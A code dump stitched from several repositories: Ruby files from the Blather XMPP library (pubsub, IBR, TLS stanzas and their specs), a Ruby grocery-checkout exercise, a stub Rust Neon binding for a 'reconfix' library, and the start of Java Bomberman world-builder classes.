            (self.pubsub << (node = XMPPNode.new('items', self.document)))
            node.namespace = self.pubsub.namespace
          end
          node
        end
      end # Items
    end # PubSub
  end # Stanza
end # Blather
<file_sep>/lib/blather/stanza/iq/query.rb
module Blather
  class Stanza
    class Iq
      # # Query Stanza
      #
      # Base class for any query-based Iq stanza; provides helpers for
      # building and accessing the <query/> child element.
      #
      # @handler :query
      class Query < Iq
        register :query, :query

        # Overrides the parent method to ensure a query node is created
        #
        # @see Blather::Stanza::Iq.new
        def self.new(*)
          stanza = super
          stanza.query
          stanza
        end

        # Overrides the parent method to ensure the current query node is destroyed
        #
        # @see Blather::Stanza::Iq#inherit
        def inherit(node)
          query.remove
          super
        end

        # Query node accessor.
        # Returns the existing query child when one is present; otherwise a
        # new one is created, attached and returned.
        #
        # @return [Blather::XMPPNode]
        def query
          ns = self.class.registered_ns
          found = ns ? find_first('query_ns:query', :query_ns => ns) : find_first('query')
          unless found
            found = XMPPNode.new('query', self.document)
            self << found
            found.namespace = ns
          end
          found
        end
      end #Query
    end #Iq
  end #Stanza
end
<file_sep>/spec/blather/stanza/pubsub_owner_spec.rb
require 'spec_helper'
require 'fixtures/pubsub'
# Specs for the XEP-0060 owner-use-case pubsub stanza.
describe Blather::Stanza::PubSubOwner do
  it 'registers itself' do
    expect(Blather::XMPPNode.class_from_registration(:pubsub, 'http://jabber.org/protocol/pubsub#owner')).to eq(Blather::Stanza::PubSubOwner)
  end

  it 'ensures a pubusb node is present on create' do
    pubsub = Blather::Stanza::PubSubOwner.new
    expect(pubsub.find_first('/iq/ns:pubsub', :ns => Blather::Stanza::PubSubOwner.registered_ns)).not_to be_nil
  end

  it 'ensures a pubsub node exists when calling #pubsub' do
    pubsub = Blather::Stanza::PubSubOwner.new
    pubsub.remove_children :pubsub
    expect(pubsub.find_first('/iq/ns:pubsub', :ns => Blather::Stanza::PubSubOwner.registered_ns)).to be_nil
    # Accessing #pubsub should lazily recreate the removed child
    expect(pubsub.pubsub).not_to be_nil
    expect(pubsub.find_first('/iq/ns:pubsub', :ns => Blather::Stanza::PubSubOwner.registered_ns)).not_to be_nil
  end

  it 'sets the host if requested' do
    aff = Blather::Stanza::PubSubOwner.new :get, 'pubsub.jabber.local'
    expect(aff.to).to eq(Blather::JID.new('pubsub.jabber.local'))
  end
end
<file_sep>/lib/blather/stream/features/tls.rb
module Blather
  class Stream
    # Stream-feature handler for STARTTLS negotiation
    # ('urn:ietf:params:xml:ns:xmpp-tls', RFC 6120 sec. 5).
    # @private
    class TLS < Features
      # Raised when the server rejects or mishandles the TLS handshake
      class TLSFailure < BlatherError
        register :tls_failure
      end

      TLS_NS = 'urn:ietf:params:xml:ns:xmpp-tls'.freeze
      register TLS_NS

      # React to TLS negotiation stanzas: answer the <starttls/> feature
      # offer with our own request, upgrade the socket on <proceed/>, and
      # treat anything else as a failure.
      def receive_data(stanza)
        element = stanza.element_name
        if element == 'starttls'
          @stream.send "<starttls xmlns='#{TLS_NS}'/>"
        elsif element == 'proceed'
          @stream.start_tls(:verify_peer => true)
          @stream.start
        else
          fail! TLSFailure.new
        end
      end
    end #TLS
  end #Stream
end #Blather
<file_sep>/lib/blather/stanza/iq/ibr.rb
module Blather
  class Stanza
    class Iq
      # # In-Band Registration
      #
      # [XEP-0077: In-Band Registration](https://xmpp.org/extensions/xep-0077.html)
      #
      # @handler :ibr
      class IBR < Query
        register :ibr, nil, "jabber:iq:register"

        # Set or clear the <registered/> flag element
        #
        # @param [true, false] reg whether the entity is already registered
        def registered=(reg)
          query.at_xpath("./ns:registered", ns: self.class.registered_ns)&.remove
          node = Nokogiri::XML::Node.new("registered", document)
          node.default_namespace = self.class.registered_ns
          query << node if reg
        end

        # @return [true, false] whether a <registered/> element is present
        def registered?
          !!query.at_xpath("./ns:registered", ns: self.class.registered_ns)
        end

        # Turn this stanza into an unregistration request: removes all
        # existing fields and inserts a single <remove/> element
        def remove!
          query.children.remove
          node = Nokogiri::XML::Node.new("remove", document)
          node.default_namespace = self.class.registered_ns
          query << node
        end

        # @return [true, false] whether a <remove/> element is present
        def remove?
          !!query.at_xpath("./ns:remove", ns: self.class.registered_ns)
        end

        # The x:data form child of the query, created on demand
        def form
          X.find_or_create(query)
        end

        # Generate a getter and a setter for every registration field
        # defined by XEP-0077 sec. 14.1.
        #
        # FIX: the "password" entry had been corrupted into a "<PASSWORD>"
        # placeholder (apparently by an automated redaction pass), which
        # produced an uncallable "<PASSWORD>=" method name and an invalid
        # XML element name instead of the XEP-0077 <password/> field.
        [
          "instructions",
          "username",
          "nick",
          "password",
          "name",
          "first",
          "last",
          "email",
          "address",
          "city",
          "state",
          "zip",
          "phone",
          "url",
          "date"
        ].each do |tag|
          # Setter: replace any existing <tag/> child with a fresh one
          # holding the given value
          define_method("#{tag}=") do |v|
            query.at_xpath("./ns:#{tag}", ns: self.class.registered_ns)&.remove
            node = Nokogiri::XML::Node.new(tag, document)
            node.default_namespace = self.class.registered_ns
            node.content = v
            query << node
          end

          # Getter: the text content of the <tag/> child, or nil if absent
          define_method(tag) do
            query.at_xpath("./ns:#{tag}", ns: self.class.registered_ns)&.content
          end
        end
      end
    end #Iq
  end #Stanza
end
<file_sep>/spec/blather/errors/stanza_error_spec.rb
require 'spec_helper'
def stanza_error_node(type = 'cancel', error = 'internal-server-error', msg = nil)
node = Blather::Stanza::Message.new '<EMAIL>', 'test message', :error
node << (error_node = Blather::XMPPNode.new('error'))
error_node['type'] = type.to_s
error_node << (err = Blather::XMPPNode.new(error, error_node.document))
err.namespace = 'urn:ietf:params:xml:ns:xmpp-stanzas'
if msg
error_node << (text = Blather::XMPPNode.new('text', error_node.document))
text.namespace = 'urn:ietf:params:xml:ns:xmpp-stanzas'
text.content = msg
end
error_node << (extra = Blather::XMPPNode.new('extra-error', error_node.document))
extra.namespace = 'blather:stanza:error'
extra.content = 'Blather Error'
node
end
describe Blather::StanzaError do
it 'can import a node' do
expect(Blather::StanzaError).to respond_to :import
e = Blather::StanzaError.import stanza_error_node
expect(e).to be_kind_of Blather::StanzaError
end
describe 'valid types' do
before { @original = Blather::Stanza::Message.new '<EMAIL>', 'test message', :error }
it 'ensures type is one of Stanza::Message::VALID_TYPES' do
expect { Blather::StanzaError.new @original, :gone, :invalid_type_name }.to raise_error(Blather::ArgumentError)
Blather::StanzaError::VALID_TYPES.each do |valid_type|
msg = Blather::StanzaError.new @original, :gone, valid_type
expect(msg.type).to eq(valid_type)
end
end
end
describe 'when instantiated' do
before do
@type = 'cancel'
@err_name = 'internal-server-error'
@msg = 'the server has experienced a misconfiguration'
@err = Blather::StanzaError.import stanza_error_node(@type, @err_name, @msg)
end
it 'provides a type attribute' do
expect(@err).to respond_to :type
expect(@err.type).to eq(@type.to_sym)
end
it 'provides a name attribute' do
expect(@err).to respond_to :name
expect(@err.name).to eq(@err_name.gsub('-','_').to_sym)
end
it 'provides a text attribute' do
expect(@err).to respond_to :text
expect(@err.text).to eq(@msg)
end
it 'provides a reader to the original node' do
expect(@err).to respond_to :original
expect(@err.original).to be_instance_of Blather::Stanza::Message
end
it 'provides an extras attribute' do
expect(@err).to respond_to :extras
expect(@err.extras).to be_instance_of Array
expect(@err.extras.first.element_name).to eq('extra-error')
end
it 'describes itself' do
expect(@err.to_s).to match(/#{@err_name}/)
expect(@err.to_s).to match(/#{@msg}/)
expect(@err.inspect).to match(/#{@err_name}/)
expect(@err.inspect).to match(/#{@msg}/)
end
it 'can be turned into xml' do
expect(@err).to respond_to :to_xml
doc = parse_stanza @err.to_xml
expect(doc.xpath("/message[@from='<EMAIL>' and @type='error']")).not_to be_empty
expect(doc.xpath("/message/error")).not_to be_empty
expect(doc.xpath("/message/error/err_ns:internal-server-error", :err_ns => Blather::StanzaError::STANZA_ERR_NS)).not_to be_empty
expect(doc.xpath("/message/error/err_ns:text[.='the server has experienced a misconfiguration']", :err_ns => Blather::StanzaError::STANZA_ERR_NS)).not_to be_empty
expect(doc.xpath("/message/error/extra_ns:extra-error[.='Blather Error']", :extra_ns => 'blather:stanza:error')).not_to be_empty
end
end
describe 'each XMPP stanza error type' do
%w[ bad-request
conflict
feature-not-implemented
forbidden
gone
internal-server-error
item-not-found
jid-malformed
not-acceptable
not-allowed
not-authorized
payment-required
recipient-unavailable
redirect
registration-required
remote-server-not-found
remote-server-timeout
resource-constraint
service-unavailable
subscription-required
undefined-condition
unexpected-request
].each do |error_type|
it "handles the name for #{error_type}" do
e = Blather::StanzaError.import stanza_error_node(:cancel, error_type)
expect(e.name).to eq(error_type.gsub('-','_').to_sym)
end
end
end
end
<file_sep>/lib/blather/errors.rb
module Blather
# Main error class
# This starts the error hierarchy
#
# @handler :error
class BlatherError < StandardError
class_attribute :handler_hierarchy
self.handler_hierarchy ||= []
# @private
@@handler_list = []
# Register the class's handler
#
# @param [Symbol] handler the handler name
def self.register(handler)
@@handler_list << handler
self.handler_hierarchy = [handler] + self.handler_hierarchy
end
# The list of registered handlers
#
# @return [Array<Symbol>] a list of currently registered handlers
def self.handler_list
@@handler_list
end
register :error
# @private
# HACK!! until I can refactor the entire Error object model
def id
nil
end
end # BlatherError
# Used in cases where a stanza only allows specific values for its attributes
# and an invalid value is attempted.
#
# @handler :argument_error
class ArgumentError < BlatherError
register :argument_error
end # ArgumentError
# The stream handler received a response it didn't know how to handle
#
# @handler :unknown_response_error
class UnknownResponse < BlatherError
register :unknown_response_error
attr_reader :node
def initialize(node)
@node = node
end
end # UnknownResponse
# Something bad happened while parsing the incoming stream
#
# @handler :parse_error
class ParseError < BlatherError
register :parse_error
attr_reader :message
def initialize(msg)
@message = msg.to_s
end
end # ParseError
end # Blather
<file_sep>/spec/blather/stanza/iq/si_spec.rb
require 'spec_helper'
def si_xml
<<-XML
<iq type='set' id='offer1' to='<EMAIL>/balcony' from='<EMAIL>/orchard'>
<si xmlns='http://jabber.org/protocol/si'
id='a0'
mime-type='text/plain'
profile='http://jabber.org/protocol/si/profile/file-transfer'>
<file xmlns='http://jabber.org/protocol/si/profile/file-transfer'
name='test.txt'
size='1022'>
<range/>
</file>
<feature xmlns='http://jabber.org/protocol/feature-neg'>
<x xmlns='jabber:x:data' type='form'>
<field var='stream-method' type='list-single'>
<option><value>http://jabber.org/protocol/bytestreams</value></option>
<option><value>http://jabber.org/protocol/ibb</value></option>
</field>
</x>
</feature>
</si>
</iq>
XML
end
describe Blather::Stanza::Iq::Si do
it 'registers itself' do
expect(Blather::XMPPNode.class_from_registration(:si, 'http://jabber.org/protocol/si')).to eq(Blather::Stanza::Iq::Si)
end
it 'can be imported' do
node = Blather::XMPPNode.parse si_xml
expect(node).to be_instance_of Blather::Stanza::Iq::Si
expect(node.si).to be_instance_of Blather::Stanza::Iq::Si::Si
end
it 'ensures a si node is present on create' do
iq = Blather::Stanza::Iq::Si.new
expect(iq.xpath('ns:si', :ns => 'http://jabber.org/protocol/si')).not_to be_empty
end
it 'ensures a si node exists when calling #si' do
iq = Blather::Stanza::Iq::Si.new
iq.si.remove
expect(iq.xpath('ns:si', :ns => 'http://jabber.org/protocol/si')).to be_empty
expect(iq.si).not_to be_nil
expect(iq.xpath('ns:si', :ns => 'http://jabber.org/protocol/si')).not_to be_empty
end
it 'ensures a si node is replaced when calling #si=' do
iq = Blather::XMPPNode.parse si_xml
new_si = Blather::Stanza::Iq::Si::Si.new
new_si.id = 'a1'
iq.si = new_si
expect(iq.xpath('ns:si', :ns => 'http://jabber.org/protocol/si').size).to eq(1)
expect(iq.si.id).to eq('a1')
end
end
describe Blather::Stanza::Iq::Si::Si do
it 'can set and get attributes' do
si = Blather::Stanza::Iq::Si::Si.new
si.id = 'a1'
si.mime_type = 'text/plain'
si.profile = 'http://jabber.org/protocol/si/profile/file-transfer'
expect(si.id).to eq('a1')
expect(si.mime_type).to eq('text/plain')
expect(si.profile).to eq('http://jabber.org/protocol/si/profile/file-transfer')
end
end
describe Blather::Stanza::Iq::Si::Si::File do
it 'can be initialized with name and size' do
file = Blather::Stanza::Iq::Si::Si::File.new('test.txt', 123)
expect(file.name).to eq('test.txt')
expect(file.size).to eq(123)
end
it 'can be initialized with node' do
node = Blather::XMPPNode.parse si_xml
file = Blather::Stanza::Iq::Si::Si::File.new node.find_first('.//ns:file', :ns => 'http://jabber.org/protocol/si/profile/file-transfer')
expect(file.name).to eq('test.txt')
expect(file.size).to eq(1022)
end
it 'can set and get description' do
file = Blather::Stanza::Iq::Si::Si::File.new('test.txt', 123)
file.desc = 'This is a test. If this were a real file...'
expect(file.desc).to eq('This is a test. If this were a real file...')
end
end
<file_sep>/lib/blather/stanza/pubsub/create.rb
module Blather
class Stanza
class PubSub
# # PubSub Create Stanza
#
# [XEP-0060 Section 8.1 - Create a Node](http://xmpp.org/extensions/xep-0060.html#owner-create)
#
# @handler :pubsub_create
class Create < PubSub
register :pubsub_create, :create, self.registered_ns
# Create a new Create Stanza
#
# @param [<Blather::Stanza::Iq::VALID_TYPES>] type the node type
# @param [String, nil] host the host to send the request to
# @param [String, nil] node the name of the node to create
def self.new(type = :set, host = nil, node = nil)
new_node = super(type, host)
new_node.create_node
new_node.configure_node
new_node.node = node
new_node
end
# Get the name of the node to create
#
# @return [String, nil]
def node
create_node[:node]
end
# Set the name of the node to create
#
# @param [String, nil] node
def node=(node)
create_node[:node] = node
end
# Get or create the actual create node on the stanza
#
# @return [Blather::XMPPNode]
def create_node
unless create_node = pubsub.find_first('ns:create', :ns => self.class.registered_ns)
self.pubsub << (create_node = XMPPNode.new('create', self.document))
create_node.namespace = self.pubsub.namespace
end
create_node
end
# Get or create the actual configure node on the stanza
#
# @return [Blather::XMPPNode]
def configure_node
unless configure_node = pubsub.find_first('ns:configure', :ns => self.class.registered_ns)
self.pubsub << (configure_node = XMPPNode.new('configure', self.document))
configure_node.namespace = self.pubsub.namespace
end
configure_node
end
end # Create
end # PubSub
end # Stanza
end # Blather
<file_sep>/spec/blather/stanza/iq/vcard_spec.rb
require 'spec_helper'
def vcard_xml
<<-XML
<iq type="result" id="blather0007" to="<EMAIL>">
<vCard xmlns="vcard-temp">
<NICKNAME>Romeo</NICKNAME>
</vCard>
</iq>
XML
end
describe Blather::Stanza::Iq::Vcard do
it 'registers itself' do
expect(Blather::XMPPNode.class_from_registration(:vCard, 'vcard-temp')).to eq(Blather::Stanza::Iq::Vcard)
end
it 'can be imported' do
query = Blather::XMPPNode.parse vcard_xml
expect(query).to be_instance_of Blather::Stanza::Iq::Vcard
expect(query.vcard).to be_instance_of Blather::Stanza::Iq::Vcard::Vcard
end
it 'ensures a vcard node is present on create' do
query = Blather::Stanza::Iq::Vcard.new
expect(query.xpath('ns:vCard', :ns => 'vcard-temp')).not_to be_empty
end
it 'ensures a vcard node exists when calling #vcard' do
query = Blather::Stanza::Iq::Vcard.new
query.vcard.remove
expect(query.xpath('ns:vCard', :ns => 'vcard-temp')).to be_empty
expect(query.vcard).not_to be_nil
expect(query.xpath('ns:vCard', :ns => 'vcard-temp')).not_to be_empty
end
it 'ensures a vcard node is replaced when calling #vcard=' do
query = Blather::XMPPNode.parse vcard_xml
new_vcard = Blather::Stanza::Iq::Vcard::Vcard.new
new_vcard["NICKNAME"] = 'Mercutio'
query.vcard = new_vcard
expect(query.xpath('ns:vCard', :ns => 'vcard-temp').size).to eq(1)
expect(query.find_first('ns:vCard/ns:NICKNAME', :ns => 'vcard-temp').content).to eq('Mercutio')
end
end
describe Blather::Stanza::Iq::Vcard::Vcard do
it 'can set vcard elements' do
query = Blather::Stanza::Iq::Vcard.new :set
query.vcard['NICKNAME'] = 'Romeo'
expect(query.find_first('ns:vCard/ns:NICKNAME', :ns => 'vcard-temp').content).to eq('Romeo')
end
it 'can set deep vcard elements' do
query = Blather::Stanza::Iq::Vcard.new :set
query.vcard['PHOTO/TYPE'] = 'image/png'
query.vcard['PHOTO/BINVAL'] = '===='
expect(query.find_first('ns:vCard/ns:PHOTO', :ns => 'vcard-temp').children.size).to eq(2)
expect(query.find_first('ns:vCard/ns:PHOTO', :ns => 'vcard-temp').children.detect { |n| n.element_name == 'TYPE' && n.content == 'image/png' }).not_to be_nil
expect(query.find_first('ns:vCard/ns:PHOTO', :ns => 'vcard-temp').children.detect { |n| n.element_name == 'BINVAL' && n.content == '====' }).not_to be_nil
end
it 'can get vcard elements' do
query = Blather::Stanza::Iq::Vcard.new :set
query.vcard['NICKNAME'] = 'Romeo'
expect(query.vcard['NICKNAME']).to eq('Romeo')
end
it 'can get deep vcard elements' do
query = Blather::Stanza::Iq::Vcard.new :set
query.vcard['PHOTO/TYPE'] = 'image/png'
query.vcard['PHOTO/BINVAL'] = '===='
expect(query.vcard['PHOTO/TYPE']).to eq('image/png')
expect(query.vcard['PHOTO/BINVAL']).to eq('====')
end
it 'returns nil on vcard elements which does not exist' do
query = Blather::Stanza::Iq::Vcard.new :set
query.vcard['NICKNAME'] = 'Romeo'
expect(query.vcard['FN']).to be_nil
end
it 'can update vcard elements' do
query = Blather::XMPPNode.parse vcard_xml
expect(query.vcard['NICKNAME']).to eq('Romeo')
query.vcard['NICKNAME'] = 'Mercutio'
expect(query.vcard['NICKNAME']).to eq('Mercutio')
end
end
<file_sep>/lib/blather/stream/features.rb
module Blather
class Stream
# @private
class Features
@@features = {}
def self.register(ns)
@@features[ns] = self
end
def self.from_namespace(ns)
@@features[ns]
end
def initialize(stream, succeed, fail)
@stream, @succeed, @fail = stream, succeed, fail
end
def receive_data(stanza)
if @feature
@feature.receive_data stanza
else
@features ||= stanza
next!
end
end
def next!
if starttls = @features.at_xpath("tls:starttls",{"tls" => "urn:ietf:params:xml:ns:xmpp-tls"})
@feature = TLS.new(@stream, nil, @fail)
@feature.receive_data(starttls)
return
end
bind = @features.at_xpath('ns:bind', ns: 'urn:ietf:params:xml:ns:xmpp-bind')
session = @features.at_xpath('ns:session', ns: 'urn:ietf:params:xml:ns:xmpp-session')
if bind && session && @features.children.last != session
bind.after session
end
@idx = @idx ? @idx+1 : 0
if stanza = @features.children[@idx]
if stanza.namespaces['xmlns'] && (klass = self.class.from_namespace(stanza.namespaces['xmlns']))
@feature = klass.new(
@stream,
proc {
if (klass == Blather::Stream::Register && stanza = feature?(:mechanisms))
@idx = @features.children.index(stanza)
@feature = Blather::Stream::SASL.new @stream, proc { next! }, @fail
@feature.receive_data stanza
else
next!
end
},
(klass == Blather::Stream::SASL && feature?(:register)) ? proc { next! } : @fail
)
@feature.receive_data stanza
else
next!
end
else
succeed!
end
end
def succeed!
@succeed.call
end
def fail!(msg)
@fail.call msg
end
def feature?(feature)
@features && @features.children.find { |v| v.element_name == feature.to_s }
end
end
end #Stream
end #Blather
<file_sep>/spec/blather/stanza/pubsub/retract_spec.rb
require 'spec_helper'
require 'fixtures/pubsub'
describe Blather::Stanza::PubSub::Retract do
it 'registers itself' do
expect(Blather::XMPPNode.class_from_registration(:retract, 'http://jabber.org/protocol/pubsub')).to eq(Blather::Stanza::PubSub::Retract)
end
it 'can be imported' do
expect(Blather::XMPPNode.parse(retract_xml)).to be_instance_of Blather::Stanza::PubSub::Retract
end
it 'ensures an retract node is present on create' do
retract = Blather::Stanza::PubSub::Retract.new
expect(retract.find('//ns:pubsub/ns:retract', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
end
it 'ensures an retract node exists when calling #retract' do
retract = Blather::Stanza::PubSub::Retract.new
retract.pubsub.remove_children :retract
expect(retract.find('//ns:pubsub/ns:retract', :ns => Blather::Stanza::PubSub.registered_ns)).to be_empty
expect(retract.retract).not_to be_nil
expect(retract.find('//ns:pubsub/ns:retract', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
end
it 'defaults to a set node' do
retract = Blather::Stanza::PubSub::Retract.new
expect(retract.type).to eq(:set)
end
it 'sets the host if requested' do
retract = Blather::Stanza::PubSub::Retract.new 'pubsub.jabber.local'
expect(retract.to).to eq(Blather::JID.new('pubsub.jabber.local'))
end
it 'sets the node' do
retract = Blather::Stanza::PubSub::Retract.new 'host', 'node-name'
expect(retract.node).to eq('node-name')
end
it 'can set the retractions as a string' do
retract = Blather::Stanza::PubSub::Retract.new 'host', 'node'
retract.retractions = 'id1'
expect(retract.xpath('//ns:retract[ns:item[@id="id1"]]', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
end
it 'can set the retractions as an array' do
retract = Blather::Stanza::PubSub::Retract.new 'host', 'node'
retract.retractions = %w[id1 id2]
expect(retract.xpath('//ns:retract[ns:item[@id="id1"] and ns:item[@id="id2"]]', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
end
it 'will iterate over each item' do
retract = Blather::Stanza::PubSub::Retract.new.inherit parse_stanza(retract_xml).root
expect(retract.retractions.size).to eq(1)
expect(retract.size).to eq(retract.retractions.size)
expect(retract.retractions).to eq(%w[ae890ac52d0df67ed7cfdf51b644e901])
end
it 'has a node attribute' do
retract = Blather::Stanza::PubSub::Retract.new
expect(retract).to respond_to :node
expect(retract.node).to be_nil
retract.node = 'node-name'
expect(retract.node).to eq('node-name')
expect(retract.xpath('//ns:retract[@node="node-name"]', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
end
it 'will iterate over each retraction' do
Blather::XMPPNode.parse(retract_xml).each do |i|
expect(i).to include "ae890ac52d0df67ed7cfdf51b644e901"
end
end
end
<file_sep>/lib/blather/stanza/pubsub/publish.rb
module Blather
class Stanza
class PubSub
# # PubSub Publish Stanza
#
# [XEP-0060 Section 7.1 - Publish an Item to a Node](http://xmpp.org/extensions/xep-0060.html#publisher-publish)
#
# @handler :pubsub_publish
class Publish < PubSub
register :pubsub_publish, :publish, self.registered_ns
include Enumerable
alias_method :find, :xpath
# Create a new publish node
#
# @param [String, nil] host the host to pushlish the node to
# @param [String, nil] node the name of the node to publish to
# @param [Blather::Stanza::Iq::VALID_TYPES] type the node type
# @param [#to_s] payload the payload to publish see {#payload=}
def self.new(host = nil, node = nil, type = :set, payload = nil)
new_node = super(type, host)
new_node.node = node
new_node.payload = payload if payload
new_node
end
# Set the payload to publish
#
# @overload payload=(hash)
# Set the payload as a set of ID => payload entries
# @param [Hash<id => payload>] hash
# @overload payload=(array)
# Set the list of payloads all at once
# @param [Array<#to_s>] array
# @overload payload=(string)
# Set the payload as a string
# @param [#to_s] string
def payload=(payload)
payload = case payload
when Hash then payload.to_a
when Array then payload.map { |v| [nil, v] }
else [[nil, payload]]
end
payload.each do |id, value|
self.publish << PubSubItem.new(id, value, self.document)
end
end
# Get the name of the node to publish to
#
# @return [String, nil]
def node
publish[:node]
end
# Set the name of the node to publish to
#
# @param [String, nil] node
def node=(node)
publish[:node] = node
end
# Get or create the actual publish node
#
# @return [Blather::XMPPNode]
def publish
unless publish = pubsub.find_first('ns:publish', :ns => self.class.registered_ns)
self.pubsub << (publish = XMPPNode.new('publish', self.document))
publish.namespace = self.pubsub.namespace
end
publish
end
# Get the list of items
#
# @return [Array<Blather::Stanza::PubSub::PubSubItem>]
def items
publish.find('ns:item', :ns => self.class.registered_ns).map do |i|
PubSubItem.new(nil,nil,self.document).inherit i
end
end
# Iterate over the list of items
#
# @yield [item] a block to accept each item
# @yieldparam [Blather::Stanza::PubSub::PubSubItem]
def each(&block)
items.each &block
end
# Get the size of the items list
#
# @return [Fixnum]
def size
items.size
end
end # Publish
end # PubSub
end # Stanza
end # Blather
| 6fd6c5b0413117acbb17c76da8baa16fbbd46508 | [
"Markdown",
"Ruby"
] | 121 | Ruby | adhearsion/blather | 03f9cda14ed3f93a80504c2538cd514d6b025d04 | 63011364c43bec00cee2d73757fd220e5576bad2 |
refs/heads/master | <file_sep>require 'pry'
def consolidate_cart(cart)
# code here
consolidated = {}
count = Hash.new(0)
cart.each do |element|
consolidated[element.keys[0]] = element.values[0]
count[element.keys[0]] += 1
end
count.each do |key, value|
consolidated[key][:count] = value
end
consolidated
end
def apply_coupons(cart, coupons)
# code here
coupons.each do |element|
if cart.keys.include?(element[:item])
element[:clearance] = cart[element[:item]][:clearance]
output_name = element[:item] + " W/COUPON"
if cart.keys.include?(output_name)
element[:count] = cart[output_name][:count]
else
element[:count] = 0
end
if cart[element[:item]][:count] >= element[:num]
cart[element[:item]][:count] -= element[:num]
element[:count] += 1
end
cart[output_name] = {}
cart[output_name][:count] = element[:count]
cart[output_name][:price]= element[:cost]
cart[output_name][:clearance] = element[:clearance]
end
end
cart
end
def apply_clearance(cart)
# code here
cart.each do |key, value|
if value[:clearance] == true
value[:price] = (value[:price] * 0.8).round(2)
end
end
cart
end
def checkout(cart, coupons)
# code here
cart = consolidate_cart(cart)
cart = apply_coupons(cart, coupons)
cart = apply_clearance(cart)
total = 0.0
cart.each do |key, value|
total += value[:price] * value[:count]
end
if total.to_f > 100
total = (total.to_f * 0.9).round(2)
end
total
end
| acb1dd176de7ff2414988d51e746682fefc6a8b6 | [
"Ruby"
] | 1 | Ruby | someotherkyle/green_grocer-online-web-prework | c72611863c7579b903b3ca554f5cc648ddfd0248 | ec4486d9b66a9884b18fbdb7fb09de56255c05b2 |
refs/heads/master | <repo_name>abrodersen/node-reconfix<file_sep>/native/src/lib.rs
#[macro_use]
extern crate neon;
extern crate reconfix;
use neon::vm::{Call, JsResult, Lock};
use neon::js::{JsString, JsNumber, JsObject, JsFunction, JsNull};
use neon::mem::Handle;
use neon::scope::{Scope, RootScope, ChainedScope};
use std::io;
use std::mem;
use std::result;
use std::error;
use std::cell::RefCell;
use std::ops::DerefMut;
use reconfix::{Reconfix, Plugin, FileNode, Content};
struct CallbackPlugin<'a>
{
scope: &'a mut RootScope<'a>,
callback: Handle<'a, JsFunction>,
}
impl<'a> Plugin<'a, 'a, StreamWrapper<'a>> for CallbackPlugin<'a>
{
fn open(&'a mut self, file: &FileNode) -> result::Result<StreamWrapper<'a>, Box<error::Error + Send + Sync>> {
let partition = JsNumber::new(self.scope, file.partition.num() as f64);
let path = &file.path;
let stream = self.callback.call(self.scope, JsNull::new(), vec![partition])
.and_then(|v| v.check::<JsObject>())
.map_err(|e| Box::new(e))?;
let wrapper = StreamWrapper {
plugin: self,
stream: stream,
};
Ok(wrapper)
}
}
struct StreamWrapper<'a>
{
plugin: &'a mut CallbackPlugin<'a>,
stream: Handle<'a, JsObject>,
}
impl<'a> io::Read for StreamWrapper<'a> {
fn read(&mut self, buf: &mut [u8]) -> io::Result<usize> {
Ok(0)
}
}
impl<'a> io::Write for StreamWrapper<'a> {
fn write(&mut self, buf: &[u8]) -> io::Result<usize> {
Ok(0)
}
fn flush(&mut self) -> io::Result<()> {
Ok(())
}
}
impl<'a> Content for StreamWrapper<'a> {}
pub struct ReconfixWrapper {
reconfix: Reconfix,
}
declare_types! {
pub class JsReconfix for ReconfixWrapper {
init(call) {
let scope = call.scope;
// let open = call.arguments.require(scope, 0)?.check::<JsFunction>()?;
// let escaped = scope.chained(move |&mut scope| {
// scope.escape(open)
// });
// let plugin = CallbackPlugin {
// scope: None,
// callback: escaped,
// };
let reconfix = Reconfix::new();
Ok(ReconfixWrapper {
//plugin: plugin,
reconfix: reconfix,
})
}
method read_values(call) {
let scope = call.scope;
let callback = call.arguments.require(scope, 0)?.check::<JsFunction>()?;
let reconfix = call.arguments.this(scope).grab(|w| w.reconfix);
let plugin = CallbackPlugin { scope: scope, callback: callback };
let result = reconfix.read_values_plugin(plugin);
Ok(JsNull::new().upcast())
}
}
}
fn hello(call: Call) -> JsResult<JsString> {
let scope = call.scope;
Ok(JsString::new(scope, "hello node").unwrap())
}
register_module!(m, {
m.export("hello", hello)
});
<file_sep>/native/Cargo.toml
[package]
name = "node-reconfix"
version = "0.1.0"
authors = ["<NAME> <<EMAIL>>"]
license = "MIT"
build = "build.rs"
[lib]
name = "node_reconfix"
crate-type = ["dylib"]
[build-dependencies]
neon-build = "0.1.20"
[dependencies]
neon = "0.1.20"
[dependencies.reconfix]
path = "../../reconfix"
<file_sep>/README.md
# node-reconfix
A Node.js wrapper for the Reconfix library.
| a206ae3acaf85213ec575265e74009d88225f51c | [
"TOML",
"Rust",
"Markdown"
] | 3 | Rust | abrodersen/node-reconfix | 4c3b1612ef6cfbf06519d757d39ccf54e082a041 | 0578d06f47b2832b5b5fce5cc999a68a297694aa |
refs/heads/master | <repo_name>VitalyNikolaev/2016-02-2d<file_sep>/src/main/java/bomberman/mechanics/tiles/behaviors/NullBehavior.java
package bomberman.mechanics.tiles.behaviors;
import bomberman.mechanics.World;
public class NullBehavior extends ActionTileAbstractBehavior {
    /**
     * A do-nothing behavior for action tiles that must not react to anything.
     *
     * @param world the world passed through to the base behavior (never used to raise events here)
     */
    public NullBehavior(World world) {
        super(world);
    }

    /**
     * Intentionally a no-op: this tile has no active behavior on any tick.
     */
    @Override
    public void behave(long deltaT) {
        // Nothing to do, by design.
    }
}
<file_sep>/src/main/java/bomberman/mechanics/worldbuilders/TextWorldBuilderV11.java
package bomberman.mechanics.worldbuilders;
import bomberman.mechanics.TileFactory;
import bomberman.mechanics.World;
import bomberman.mechanics.interfaces.EntityType;
import bomberman.mechanics.interfaces.ITile;
import bomberman.mechanics.interfaces.IWorldBuilder;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.jetbrains.annotations.Nullable;
import java.io.BufferedReader;
import java.io.File;
import java.io.FileReader;
import java.io.IOException;
import java.util.*;
////
////
// Difference from v1.0:
// * Undestructible wall is 'x' now instead of '#'. Easier to type.
// * World dimensions are now variable, but world is still square.
////
////
public class TextWorldBuilderV11 implements IWorldBuilder {

    /**
     * Scans the "data/worlds" directory and creates a builder for every blueprint file
     * that parses as a v1.1 world. Files that fail to parse (wrong version, unreadable,
     * malformed) are logged and skipped.
     *
     * @return map from blueprint file name (extension stripped) to its builder
     */
    public static Map<String, IWorldBuilder> getAllTextBuilders() {
